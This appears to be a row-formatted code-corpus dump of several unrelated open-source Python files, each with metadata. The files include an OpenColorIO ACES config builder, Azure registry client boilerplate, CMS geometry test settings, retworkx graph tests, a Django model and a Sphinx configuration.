ocio.ROLE_SCENE_LINEAR: f'{aces_family_prefix} - ACEScg',
},
colorspaces=colorspaces + displays,
looks=looks,
view_transforms=view_transforms + [untonemapped_view_transform],
shared_views=shared_views,
views=shared_views + [{
'display': display,
'view': 'Raw',
'colorspace': 'Utility - Raw'
} for display in display_names],
active_displays=display_names,
active_views=view_transform_names + ['Raw'],
file_rules=[{
'name': 'Default',
'colorspace': scene_reference_colorspace.getName()
}],
inactive_colorspaces=['CIE-XYZ-D65'],
default_view_transform=untonemapped_view_transform.getName(),
profile_version=2)
config = generate_config(data, config_name, validate)
if additional_data:
return config, data
else:
return config
if __name__ == '__main__':
import os
import opencolorio_config_aces
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
build_directory = os.path.join(opencolorio_config_aces.__path__[0], '..',
'build')
if not os.path.exists(build_directory):
os.makedirs(build_directory)
config, data = generate_config_aces(
config_name=os.path.join(build_directory,
'config-aces-reference.ocio'),
analytical=False,
additional_data=True)
| true | true |
f710006f30293d1e950a819440eba24d7dbe294e | 1,359 | py | Python | src/kv_classes/lang.py | Mulugruntz/deep_3d_photo | e296343757b5715145d49f283732821ef7915472 | [
"MIT"
] | 7 | 2020-07-22T07:35:15.000Z | 2021-12-29T13:46:31.000Z | src/kv_classes/lang.py | Mulugruntz/deep_3d_photo | e296343757b5715145d49f283732821ef7915472 | [
"MIT"
] | 2 | 2021-04-01T10:39:14.000Z | 2021-12-29T14:06:04.000Z | src/kv_classes/lang.py | Mulugruntz/deep_3d_photo | e296343757b5715145d49f283732821ef7915472 | [
"MIT"
] | null | null | null | from kivy.lang import Observable
import gettext
from constants import LOCALE_DIR
class Lang(Observable):
observers = []
lang = None
def __init__(self, defaultlang, transalte=None):
super(Lang, self).__init__()
self.ugettext = None
self.lang = defaultlang
self._translate = transalte if transalte is not None else gettext.gettext
self.switch_lang(self.lang)
def __call__(self, text):
return self._translate(text)
def fbind(self, name, func, *largs, **kwargs):
if name == "_":
self.observers.append((func, largs, kwargs))
else:
return super(Lang, self).fbind(name, func, *largs, **kwargs)
def funbind(self, name, func, *largs, **kwargs):
if name == "_":
key = (func, largs, kwargs)
if key in self.observers:
self.observers.remove(key)
else:
return super(Lang, self).funbind(name, func, *largs, **kwargs)
def switch_lang(self, lang):
# get the right locales directory, and instanciate a gettext
locales = gettext.translation('Deep3DPhoto', LOCALE_DIR, languages=[lang])
self.ugettext = locales.gettext
# update all the kv rules attached to this text
for func, largs, kwargs in self.observers:
func(largs, None, None)
| 31.604651 | 82 | 0.617366 | from kivy.lang import Observable
import gettext
from constants import LOCALE_DIR
class Lang(Observable):
observers = []
lang = None
def __init__(self, defaultlang, transalte=None):
super(Lang, self).__init__()
self.ugettext = None
self.lang = defaultlang
self._translate = transalte if transalte is not None else gettext.gettext
self.switch_lang(self.lang)
def __call__(self, text):
return self._translate(text)
def fbind(self, name, func, *largs, **kwargs):
if name == "_":
self.observers.append((func, largs, kwargs))
else:
return super(Lang, self).fbind(name, func, *largs, **kwargs)
def funbind(self, name, func, *largs, **kwargs):
if name == "_":
key = (func, largs, kwargs)
if key in self.observers:
self.observers.remove(key)
else:
return super(Lang, self).funbind(name, func, *largs, **kwargs)
def switch_lang(self, lang):
locales = gettext.translation('Deep3DPhoto', LOCALE_DIR, languages=[lang])
self.ugettext = locales.gettext
for func, largs, kwargs in self.observers:
func(largs, None, None)
| true | true |
f710013e8fda200cf47f10c609828756146e2766 | 7,377 | py | Python | sdk/containerregistry/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2020_11_01_preview/aio/_container_registry_management_client.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/containerregistry/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2020_11_01_preview/aio/_container_registry_management_client.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/containerregistry/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2020_11_01_preview/aio/_container_registry_management_client.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import ContainerRegistryManagementClientConfiguration
from .operations import ConnectedRegistriesOperations
from .operations import ExportPipelinesOperations
from .operations import RegistriesOperations
from .operations import ImportPipelinesOperations
from .operations import Operations
from .operations import PipelineRunsOperations
from .operations import PrivateEndpointConnectionsOperations
from .operations import ReplicationsOperations
from .operations import ScopeMapsOperations
from .operations import TokensOperations
from .operations import WebhooksOperations
from .. import models
class ContainerRegistryManagementClient(object):
"""ContainerRegistryManagementClient.
:ivar connected_registries: ConnectedRegistriesOperations operations
:vartype connected_registries: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ConnectedRegistriesOperations
:ivar export_pipelines: ExportPipelinesOperations operations
:vartype export_pipelines: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ExportPipelinesOperations
:ivar registries: RegistriesOperations operations
:vartype registries: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.RegistriesOperations
:ivar import_pipelines: ImportPipelinesOperations operations
:vartype import_pipelines: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ImportPipelinesOperations
:ivar operations: Operations operations
:vartype operations: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.Operations
:ivar pipeline_runs: PipelineRunsOperations operations
:vartype pipeline_runs: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.PipelineRunsOperations
:ivar private_endpoint_connections: PrivateEndpointConnectionsOperations operations
:vartype private_endpoint_connections: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.PrivateEndpointConnectionsOperations
:ivar replications: ReplicationsOperations operations
:vartype replications: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ReplicationsOperations
:ivar scope_maps: ScopeMapsOperations operations
:vartype scope_maps: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ScopeMapsOperations
:ivar tokens: TokensOperations operations
:vartype tokens: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.TokensOperations
:ivar webhooks: WebhooksOperations operations
:vartype webhooks: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.WebhooksOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The Microsoft Azure subscription ID.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = ContainerRegistryManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.connected_registries = ConnectedRegistriesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.export_pipelines = ExportPipelinesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.registries = RegistriesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.import_pipelines = ImportPipelinesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.pipeline_runs = PipelineRunsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.replications = ReplicationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.scope_maps = ScopeMapsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.tokens = TokensOperations(
self._client, self._config, self._serialize, self._deserialize)
self.webhooks = WebhooksOperations(
self._client, self._config, self._serialize, self._deserialize)
async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.AsyncHttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "ContainerRegistryManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| 55.466165 | 143 | 0.755456 |
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import ContainerRegistryManagementClientConfiguration
from .operations import ConnectedRegistriesOperations
from .operations import ExportPipelinesOperations
from .operations import RegistriesOperations
from .operations import ImportPipelinesOperations
from .operations import Operations
from .operations import PipelineRunsOperations
from .operations import PrivateEndpointConnectionsOperations
from .operations import ReplicationsOperations
from .operations import ScopeMapsOperations
from .operations import TokensOperations
from .operations import WebhooksOperations
from .. import models
class ContainerRegistryManagementClient(object):
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = ContainerRegistryManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.connected_registries = ConnectedRegistriesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.export_pipelines = ExportPipelinesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.registries = RegistriesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.import_pipelines = ImportPipelinesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.pipeline_runs = PipelineRunsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.replications = ReplicationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.scope_maps = ScopeMapsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.tokens = TokensOperations(
self._client, self._config, self._serialize, self._deserialize)
self.webhooks = WebhooksOperations(
self._client, self._config, self._serialize, self._deserialize)
async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "ContainerRegistryManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| true | true |
f71001c69e6b9033c61079b91a451817bc6a6ed7 | 3,311 | py | Python | Geometry/MTDCommonData/test/testMTDinDD4hep.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 6 | 2017-09-08T14:12:56.000Z | 2022-03-09T23:57:01.000Z | Geometry/MTDCommonData/test/testMTDinDD4hep.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 545 | 2017-09-19T17:10:19.000Z | 2022-03-07T16:55:27.000Z | Geometry/MTDCommonData/test/testMTDinDD4hep.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 14 | 2017-10-04T09:47:21.000Z | 2019-10-23T18:04:45.000Z | import FWCore.ParameterSet.Config as cms
process = cms.Process("CompareGeometryTest")
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.MessageLogger = cms.Service(
"MessageLogger",
statistics = cms.untracked.vstring('cout'),
categories = cms.untracked.vstring('MTDUnitTest',
'DD4hep_TestMTDIdealGeometry',
'DD4hep_TestMTDPath',
'DD4hep_TestMTDNumbering',
'DD4hep_TestMTDPosition'),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('INFO'),
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
DD4hep_TestMTDIdealGeometry = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDPath = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDNumbering = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDPosition = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
noLineBreaks = cms.untracked.bool(True)
),
mtdCommonDataDD4hep = cms.untracked.PSet(
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
noLineBreaks = cms.untracked.bool(True),
DEBUG = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
WARNING = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
ERROR = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
threshold = cms.untracked.string('INFO'),
MTDUnitTest = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
),
destinations = cms.untracked.vstring('cout',
'mtdCommonDataDD4hep')
)
process.DDDetectorESProducer = cms.ESSource("DDDetectorESProducer",
confGeomXMLFiles = cms.FileInPath('Geometry/MTDCommonData/data/dd4hep/cms-mtdD50-geometry.xml'),
appendToDataLabel = cms.string('MTD')
)
process.DDSpecParRegistryESProducer = cms.ESProducer("DDSpecParRegistryESProducer",
appendToDataLabel = cms.string('MTD')
)
process.testBTL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
DDDetector = cms.ESInputTag('','MTD'),
ddTopNodeName = cms.untracked.string('BarrelTimingLayer'),
theLayout = cms.untracked.uint32(4)
)
process.testETL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
DDDetector = cms.ESInputTag('','MTD'),
ddTopNodeName = cms.untracked.string('EndcapTimingLayer'),
theLayout = cms.untracked.uint32(4)
)
process.Timing = cms.Service("Timing")
process.p1 = cms.Path(process.testBTL+process.testETL)
| 38.952941 | 140 | 0.534884 | import FWCore.ParameterSet.Config as cms
process = cms.Process("CompareGeometryTest")
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.MessageLogger = cms.Service(
"MessageLogger",
statistics = cms.untracked.vstring('cout'),
categories = cms.untracked.vstring('MTDUnitTest',
'DD4hep_TestMTDIdealGeometry',
'DD4hep_TestMTDPath',
'DD4hep_TestMTDNumbering',
'DD4hep_TestMTDPosition'),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('INFO'),
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
DD4hep_TestMTDIdealGeometry = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDPath = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDNumbering = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDPosition = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
noLineBreaks = cms.untracked.bool(True)
),
mtdCommonDataDD4hep = cms.untracked.PSet(
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
noLineBreaks = cms.untracked.bool(True),
DEBUG = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
WARNING = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
ERROR = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
threshold = cms.untracked.string('INFO'),
MTDUnitTest = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
),
destinations = cms.untracked.vstring('cout',
'mtdCommonDataDD4hep')
)
process.DDDetectorESProducer = cms.ESSource("DDDetectorESProducer",
confGeomXMLFiles = cms.FileInPath('Geometry/MTDCommonData/data/dd4hep/cms-mtdD50-geometry.xml'),
appendToDataLabel = cms.string('MTD')
)
process.DDSpecParRegistryESProducer = cms.ESProducer("DDSpecParRegistryESProducer",
appendToDataLabel = cms.string('MTD')
)
process.testBTL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
DDDetector = cms.ESInputTag('','MTD'),
ddTopNodeName = cms.untracked.string('BarrelTimingLayer'),
theLayout = cms.untracked.uint32(4)
)
process.testETL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
DDDetector = cms.ESInputTag('','MTD'),
ddTopNodeName = cms.untracked.string('EndcapTimingLayer'),
theLayout = cms.untracked.uint32(4)
)
process.Timing = cms.Service("Timing")
process.p1 = cms.Path(process.testBTL+process.testETL)
| true | true |
f71002071aa31f475e86d1779639faaa7bdb84e1 | 2,371 | py | Python | tests/digraph/test_depth.py | georgios-ts/retworkx | 8efe47c8ffaa2bdf1730ad50ada389bf9ca15229 | [
"Apache-2.0"
] | null | null | null | tests/digraph/test_depth.py | georgios-ts/retworkx | 8efe47c8ffaa2bdf1730ad50ada389bf9ca15229 | [
"Apache-2.0"
] | null | null | null | tests/digraph/test_depth.py | georgios-ts/retworkx | 8efe47c8ffaa2bdf1730ad50ada389bf9ca15229 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
import retworkx
class TestLongestPath(unittest.TestCase):
def test_linear(self):
"""Longest depth for a simple dag.
a
|
b
|\
c d
|\
e |
| |
f g
"""
dag = retworkx.PyDAG()
node_a = dag.add_node("a")
node_b = dag.add_child(node_a, "b", {})
node_c = dag.add_child(node_b, "c", {})
dag.add_child(node_b, "d", {})
node_e = dag.add_child(node_c, "e", {})
node_f = dag.add_child(node_e, "f", {})
dag.add_child(node_c, "g", {})
self.assertEqual(4, retworkx.dag_longest_path_length(dag))
self.assertEqual(
[node_a, node_b, node_c, node_e, node_f],
retworkx.dag_longest_path(dag),
)
def test_less_linear(self):
dag = retworkx.PyDAG()
node_a = dag.add_node("a")
node_b = dag.add_child(node_a, "b", {})
node_c = dag.add_child(node_b, "c", {})
node_d = dag.add_child(node_c, "d", {})
node_e = dag.add_child(node_d, "e", {})
dag.add_edge(node_a, node_c, {})
dag.add_edge(node_a, node_e, {})
dag.add_edge(node_c, node_e, {})
self.assertEqual(4, retworkx.dag_longest_path_length(dag))
self.assertEqual(
[node_a, node_b, node_c, node_d, node_e],
retworkx.dag_longest_path(dag),
)
def test_degenerate_graph(self):
dag = retworkx.PyDAG()
dag.add_node(0)
self.assertEqual(0, retworkx.dag_longest_path_length(dag))
self.assertEqual([0], retworkx.dag_longest_path(dag))
def test_empty_graph(self):
dag = retworkx.PyDAG()
self.assertEqual(0, retworkx.dag_longest_path_length(dag))
self.assertEqual([], retworkx.dag_longest_path(dag))
| 32.930556 | 75 | 0.6124 |
import unittest
import retworkx
class TestLongestPath(unittest.TestCase):
def test_linear(self):
dag = retworkx.PyDAG()
node_a = dag.add_node("a")
node_b = dag.add_child(node_a, "b", {})
node_c = dag.add_child(node_b, "c", {})
dag.add_child(node_b, "d", {})
node_e = dag.add_child(node_c, "e", {})
node_f = dag.add_child(node_e, "f", {})
dag.add_child(node_c, "g", {})
self.assertEqual(4, retworkx.dag_longest_path_length(dag))
self.assertEqual(
[node_a, node_b, node_c, node_e, node_f],
retworkx.dag_longest_path(dag),
)
def test_less_linear(self):
dag = retworkx.PyDAG()
node_a = dag.add_node("a")
node_b = dag.add_child(node_a, "b", {})
node_c = dag.add_child(node_b, "c", {})
node_d = dag.add_child(node_c, "d", {})
node_e = dag.add_child(node_d, "e", {})
dag.add_edge(node_a, node_c, {})
dag.add_edge(node_a, node_e, {})
dag.add_edge(node_c, node_e, {})
self.assertEqual(4, retworkx.dag_longest_path_length(dag))
self.assertEqual(
[node_a, node_b, node_c, node_d, node_e],
retworkx.dag_longest_path(dag),
)
def test_degenerate_graph(self):
dag = retworkx.PyDAG()
dag.add_node(0)
self.assertEqual(0, retworkx.dag_longest_path_length(dag))
self.assertEqual([0], retworkx.dag_longest_path(dag))
def test_empty_graph(self):
dag = retworkx.PyDAG()
self.assertEqual(0, retworkx.dag_longest_path_length(dag))
self.assertEqual([], retworkx.dag_longest_path(dag))
| true | true |
f710059dee719252061de77a44f95f80a232bbe1 | 482 | py | Python | mmcap/utils/logger.py | hnp0411/mmcaptioning | 47bcdee3734cdaaa96a34e927cdec5cc43cab538 | [
"Apache-2.0"
] | null | null | null | mmcap/utils/logger.py | hnp0411/mmcaptioning | 47bcdee3734cdaaa96a34e927cdec5cc43cab538 | [
"Apache-2.0"
] | null | null | null | mmcap/utils/logger.py | hnp0411/mmcaptioning | 47bcdee3734cdaaa96a34e927cdec5cc43cab538 | [
"Apache-2.0"
] | null | null | null | import logging
from mmcv.utils import get_logger
def get_root_logger(log_file=None, log_level=logging.INFO):
"""Get root logger.
Args:
log_file (str, optional): File path of log. Defaults to None.
log_level (int, optional): The level of logger.
Defaults to logging.INFO.
Returns:
:obj:`logging.Logger`: The obtained logger
"""
logger = get_logger(name='mmcap', log_file=log_file, log_level=log_level)
return logger
| 22.952381 | 77 | 0.670124 | import logging
from mmcv.utils import get_logger
def get_root_logger(log_file=None, log_level=logging.INFO):
logger = get_logger(name='mmcap', log_file=log_file, log_level=log_level)
return logger
| true | true |
f71006b40f042b75b7b313be0ca71bb1ccf5d8ae | 191 | py | Python | automated/__init__.py | gabrielfern/automated-leda-tasks | b50bb14d118d64ad7361b5eb8bee9cf248bc57cf | [
"MIT"
] | 9 | 2017-07-26T19:10:12.000Z | 2018-04-25T02:27:09.000Z | automated/__init__.py | gabrielfern/automated-leda-tasks | b50bb14d118d64ad7361b5eb8bee9cf248bc57cf | [
"MIT"
] | 3 | 2017-08-02T23:32:28.000Z | 2018-10-13T00:08:54.000Z | automated/__init__.py | hericlesme/automated-leda-tasks | f0759d310636d281789f05bac7c9c624b75ab0e5 | [
"MIT"
] | 1 | 2018-05-24T23:55:31.000Z | 2018-05-24T23:55:31.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Gabriel Fernandes <gabrielfernndss@gmail.com>
# Héricles Emanuel <hericles.me@gmail.com>
if __name__ == '__main__':
print('easter_egg!')
| 21.222222 | 47 | 0.680628 |
if __name__ == '__main__':
print('easter_egg!')
| true | true |
f710076e41e510dc6c2d749b607b512d2e7db9c3 | 1,706 | py | Python | passgen/models.py | diyajaiswal11/HackCorona | dc6f7803a77b7ce6325f8d61f5f4fe54076ea461 | [
"MIT"
] | 7 | 2020-04-06T13:00:14.000Z | 2021-08-07T04:26:53.000Z | passgen/models.py | diyajaiswal11/HackCorona | dc6f7803a77b7ce6325f8d61f5f4fe54076ea461 | [
"MIT"
] | 10 | 2020-04-07T07:07:44.000Z | 2022-03-12T00:22:47.000Z | passgen/models.py | diyajaiswal11/HackCorona | dc6f7803a77b7ce6325f8d61f5f4fe54076ea461 | [
"MIT"
] | 2 | 2020-04-03T08:36:34.000Z | 2021-07-27T19:22:15.000Z | from django.db import models
from django.utils import timezone
category_choices = (
("Essential Services Pass", "Essential Services Pass"),
("Emergency Services Pass", "Emergency Services Pass"),
)
subcategory_choices = (
("ATM/Banking", "ATM/Banking"),
("Delivery Worker", "Delivery Worker"),
("Fruit/Vegetable Vendor","Fruit/Vegetable Vendor"),
("Govt Officials","Govt Officials"),
("Grocery Vendor","Grocery Vendor"),
("Milk Vendor","Milk Vendor"),
("Health Worker","Health Worker"),
("IT/Tele Communication","IT/Tele Communication"),
("Municipal Services","Municipal Services"),
("Power/Electricity","Power/Electricity"),
("Sanitation","Sanitation"),
("Businessman","Businessman"),
)
# Create your models here.
class PassModel(models.Model):
district=models.CharField(max_length=20,null=True)
name=models.CharField(max_length=200,null=True)
email=models.CharField(max_length=200,null=True)
vehiclenumber=models.CharField(max_length=200,null=True)
phonenumber=models.CharField(max_length=10,null=True)
aadharcardnumber=models.CharField(max_length=12,null=True)
address=models.CharField(max_length=200,null=True)
reason=models.CharField(max_length=200,null=True)
issuedate=models.DateTimeField(default=timezone.now)
passcategory=models.CharField(max_length=30,choices = category_choices)
subcategory=models.CharField(max_length=30,choices = subcategory_choices)
attachphoto=models.ImageField(upload_to='profile_pics')
attachidproof=models.ImageField(upload_to='id_proof')
uniquenumber=models.CharField(max_length=10000,default=201301)
checked=models.BooleanField(default=0)
| 41.609756 | 78 | 0.736225 | from django.db import models
from django.utils import timezone
category_choices = (
("Essential Services Pass", "Essential Services Pass"),
("Emergency Services Pass", "Emergency Services Pass"),
)
subcategory_choices = (
("ATM/Banking", "ATM/Banking"),
("Delivery Worker", "Delivery Worker"),
("Fruit/Vegetable Vendor","Fruit/Vegetable Vendor"),
("Govt Officials","Govt Officials"),
("Grocery Vendor","Grocery Vendor"),
("Milk Vendor","Milk Vendor"),
("Health Worker","Health Worker"),
("IT/Tele Communication","IT/Tele Communication"),
("Municipal Services","Municipal Services"),
("Power/Electricity","Power/Electricity"),
("Sanitation","Sanitation"),
("Businessman","Businessman"),
)
class PassModel(models.Model):
district=models.CharField(max_length=20,null=True)
name=models.CharField(max_length=200,null=True)
email=models.CharField(max_length=200,null=True)
vehiclenumber=models.CharField(max_length=200,null=True)
phonenumber=models.CharField(max_length=10,null=True)
aadharcardnumber=models.CharField(max_length=12,null=True)
address=models.CharField(max_length=200,null=True)
reason=models.CharField(max_length=200,null=True)
issuedate=models.DateTimeField(default=timezone.now)
passcategory=models.CharField(max_length=30,choices = category_choices)
subcategory=models.CharField(max_length=30,choices = subcategory_choices)
attachphoto=models.ImageField(upload_to='profile_pics')
attachidproof=models.ImageField(upload_to='id_proof')
uniquenumber=models.CharField(max_length=10000,default=201301)
checked=models.BooleanField(default=0)
| true | true |
f71008c40263271753ec152fe0f9a5a57343a4fd | 6,627 | py | Python | docs/conf.py | scipp/scippnexus | 978b3b671355f55f94eb9d79f2ffe5cf793605ba | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | scipp/scippnexus | 978b3b671355f55f94eb9d79f2ffe5cf793605ba | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | scipp/scippnexus | 978b3b671355f55f94eb9d79f2ffe5cf793605ba | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import doctest
from datetime import date
import scippnexus
html_show_sourcelink = True
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.mathjax',
'sphinx.ext.napoleon',
'sphinx_autodoc_typehints',
'sphinx_copybutton',
'nbsphinx',
]
autodoc_type_aliases = {
'VariableLike': 'VariableLike',
'MetaDataMap': 'MetaDataMap',
'array_like': 'array_like',
}
rst_epilog = f"""
.. |SCIPP_RELEASE_MONTH| replace:: {date.today().strftime("%B %Y")}
.. |SCIPP_VERSION| replace:: {scippnexus.__version__}
""" # noqa: E501
intersphinx_mapping = {
'python': ('https://docs.python.org/3', None),
'numpy': ('https://numpy.org/doc/stable/', None),
'scipp': ('https://scipp.github.io/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/', None),
'xarray': ('https://xarray.pydata.org/en/stable/', None)
}
# autodocs includes everything, even irrelevant API internals. autosummary
# looks more suitable in the long run when the API grows.
# For a nice example see how xarray handles its API documentation.
autosummary_generate = True
napoleon_google_docstring = False
napoleon_numpy_docstring = True
napoleon_use_param = True
napoleon_use_rtype = False
napoleon_preprocess_types = True
napoleon_type_aliases = {
# objects without namespace: scipp
"DataArray": "~scipp.DataArray",
"Dataset": "~scipp.Dataset",
"Variable": "~scipp.Variable",
# objects without namespace: numpy
"ndarray": "~numpy.ndarray",
}
typehints_defaults = 'comma'
typehints_use_rtype = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
html_sourcelink_suffix = '' # Avoid .ipynb.txt extensions in sources
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'scippnexus'
